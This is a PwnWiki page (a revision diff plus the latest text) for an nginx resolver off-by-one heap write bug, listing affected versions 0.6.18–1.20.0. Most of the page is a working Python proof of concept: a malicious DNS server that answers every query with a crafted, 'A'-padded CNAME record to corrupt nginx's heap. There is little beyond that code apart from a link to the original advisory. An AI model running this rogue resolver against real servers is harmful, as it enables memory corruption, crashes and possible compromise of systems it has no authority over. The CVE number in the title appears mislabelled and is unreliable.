Difference between revisions of "CVE-2021-23097 Nginx解析器 Off-by-One堆寫入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> 0.6.18 - 1.20.0 </pre> ==POC== <pre> from binascii import hexlify, unhexlify from socket import AF_INET, SOCK_DG...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 36: | Line 36: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:2--> |
</translate> | </translate> | ||
https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py | https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py | ||
Latest revision as of 22:48, 15 June 2021
影響版本
0.6.18 - 1.20.0
POC
from binascii import hexlify, unhexlify
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack
sock = socket(AF_INET, SOCK_DGRAM)
sock.bind(('0.0.0.0', 1053))
while True:
request, addr = sock.recvfrom(4096)
print(b'<<< '+hexlify(request))
ident = request[0:2]
# find request
nullptr = request.find(0x0,12)
reqname = request[12:request.find(0x0,12)+1]
reqtype = request[nullptr+1:nullptr+3]
reqclass = request[nullptr+3:nullptr+5]
print('name: %s, type: %s, class: %s' % (reqname, unpack('>H', reqtype), unpack('>H', reqclass)))
# CNAME response
response = request[0:2] + \
unhexlify('''81800001000100000000''') + \
reqname + reqtype + reqclass + \
unhexlify('c00c0005000100000e10000b18414141414141414141414141414141414141414141414141c004')
print(b'>>> '+hexlify(response))
sock.sendto(bytes(response), addr)
